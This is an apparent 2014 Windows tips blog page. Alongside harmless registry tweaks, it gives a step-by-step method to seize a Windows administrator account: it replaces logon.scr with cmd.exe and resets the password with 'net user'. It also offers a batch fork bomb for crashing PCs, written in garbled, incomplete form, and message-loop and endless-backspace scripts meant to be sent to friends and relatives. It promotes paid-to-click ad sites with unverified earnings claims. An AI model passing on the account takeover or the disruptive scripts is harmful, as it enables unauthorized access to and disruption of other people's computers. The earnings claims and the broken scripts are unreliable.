Sunday, July 6, 2014

How to set all locks of your Keyboard

If you want to setup all the lock keys of your keyboard(Num,Caps,Scroll) at startup state you just need to follow these steps:
>>Go to start>Run>Type regedit to open registry editor
>>Navigate to the following key:HKEY_CURRENT_USER\Control Panel\Keyboard
>>Now open InitialKeyboardIndicators which is available in the right window pane.
>>Change its value data to the following numbers:
  • 0 - All Keys off
  • 1 - Caps Lock on
  • 2 - Num Lock on
  • 4 - Scroll Lock on
>>For multiple setups:
  • 3 - Caps Lock and Num Lock on
  • 5 - Caps Lock and Scroll Lock on
  • 6 - Num Lock and Scroll Lock on
  • 7 - Caps Lock, Num Lock, and Scroll Lock on
*Restart to see the changes on your keyboard

Easy way to crash a computer(Infinite way)

This is bad thing to say but any PC can be crashed within a minute by just following these steps:

>>Open notepad type
......8 times
>>Save this file as hax.bat
>>Run it
>>It opens up 8 times
>>Then type hax.bat at last line
>>Now this will open up start for infinite times.

Cycle Message prank

This a small message cycle prank in which a message appears upto infinite times Just follow these steps:
>>Open notepad & type:
@ECHO off
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d

>>Save this as msg.bat and send this file to any of your friends/relatives

*You can also increase the messages by typing msg * your message [Dont forget spaces wherever needed] before GOTO BEGIN and after :Begin .To stop this prank just remove all the text of  the file msg.bat by editing and saving it ,when the file is run.

Infinte Backspace

The backspace is  hit infinite times.All you have to do is to follow these steps:
>>Open new notepad file:

MsgBox "Let's go back infinte times"
Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{bs}"

>>Save it as infiback.vbs  and send this file to any of you friends/relatives

*To stop this script from functioning ,Press Ctrl+Alt+Delete to open task manager and select process to see list of processes .Under processes select a process named WScript.exe , right click and end that process.

Best ways to make money online

I found some ways to earn from internet which are 100% working .You will be get paid for just clicking some ads (Usually takes 5-10 mins.) from these websites(no investement required ).These are the top 5 elite sites untill now which have been  paying money online without any problems.

This site is genuine and paying without any complaints for 3 years:


For standard a/c:
Daily: min 12 ads+ 1 Normal ad (0.022/day)
Normal ads: $0.01 /ad
Mini ads: $0.005 /ad
Micro ads: $0.001/ad
Referrals:Rented: $0.20 per referral per 30 days(Min. 3): $0.005 per referral click
Direct: Max. 30 : $0.005 per referral click
Min. payout:$2(Instant)
Payment processor: Alertpay or Paypal
Paying since: 2008

Another  most genuine paid to click site: 


For standard a/c:
Daily: min. 4 ads (0.04/day) [Depends on your location]
Normal ads: $0.01 /ad
Mini ads: $0.005 /ad
Micro ads: $0.001 /ad
Referrals: Direct ($0.002 per click)
Min. payout: $10(Weekly Mondays)
Payment processor: Alertpay or Paypal
Paying since: 2007

Another genuine best paid to click side: 


For normal a/c:
Daily min. : 4 normal ads ($0.04/day)
Max. direct referrals: 55
Rented referrals option available: $2 per referral(Min. 2) for unlimited days:Upto $0.005 per referral click
Normal ads(30s): $0.01 /ad
Min. Payout: $4 (instant)
Payment processor: Alertpay or Paypal
Paying since :2010 

Fastest way to earn from internet : 


For standard a/c:
Daily: 20-25 ads
Ads:Normal: 0.0005 per click
Referrals: Direct + Rented($0.5/referral) :Upto 75% of referrals earnings
Min. Payout: $0.05(Paypal) ; $1 (Alertpay) [Within 24 hours]
Payment Proof : 1  2 3
Paying since: 2010

Best growing PTC site:


For normal a/c:
Daily min. : 4 normal ads ($0.04/day)
Max. direct referrals: 55
Rented referrals option available: $1.5 per referral(Min. 3) for unlimited days:Upto $0.005 per referral click
Normal ads(30s): $0.01 /ad
Min. Payout: $4 (instant)
Payment processor: Alertpay or Paypal
Paying since : 2010

*The bold words or numbers show special unique features of the  ptc sites.
*Onbux is scam site from april of this year .So i have removed it from here.

Keep your Broadband connection ON even if you log off from your PC

Now you can keep your Broadband connection ON even if you log off from your PC by just following these steps:

>>Go to Start>Run , type regedit to open registry editor
>>In registry editor navigate to the following directory:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Click on the image to zoom
>>Select winlogon and under it create a new string value named KeepRasConnections
>>Double click it and change its value data to 1

*Thats it now you log off your PC and login again to see broadband connection still ON

Add or remove your username in Start Menu

By default , windows shows your username at the top of start menu.If you want to remove this , you can just follow these steps:

>>Go to Start>Run . Type regedit to open registry editor
>>Now navigate to the following key : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
No username in start menu
Click to zoom
>>If you can see a Dword value named NoUserNameInStartMenu then double click that key and change its value to 1 if you want to see remove username in Start Menu
>>Change its value to 0 if you want to see username in StartMenu

*If you cant see the above Dword value. Create a new dword value  by right clicking on the right window pane and rename it to NoUserNameInStartMenu

How to hack administrator password [New]

I have already shown how to hack admin password in the basic way.If that doesn't work , you can try this new and advance method to hack administrator password.
>>Go to Start>Run , type cmd to open  command prompt
>>Enter this command cd\ to make directory to C:(default drive)
>>Now enter this command cd windows\system32  , to change the directory in command prompt to C:\windows\system32
>>Now type mkdir temphack to make a temporary directory for backup
Admin Hack
Admin Hack
>>Then , type copy logon.scr temphack\logon.scr  to copy logon.scr to temphack folder
>>Now type  copy cmd.exe temphack\cmd.exe copy cmd.exe to temphack folder
>>Then type del logon.scr to delete logon.scr . The backup of this file is in the folder temphack
>>Now type rename cmd.exe logon.scr to rename command prompt to logon screensaver
>>Now you get unprotected command prompt without logging in when windows loads logon screensaver at startup
>>When command prompt appears enter this command
net user admin infinitepc 
>>Now you have hacked admin account and his/her password is set to infinitepc
>>After you have hacked admin you can restart and login with hacked administrator password

*Dont forget the spaces involved in all the above commands
*To restore this hack just go to temphack folder found in windows\system32 directory and copy those two files in that folder and paste those files in system32 folder(overwrite those files in this folder)
*The above hack works mostly  on FAT/FAT 32 systems not on NTFS systems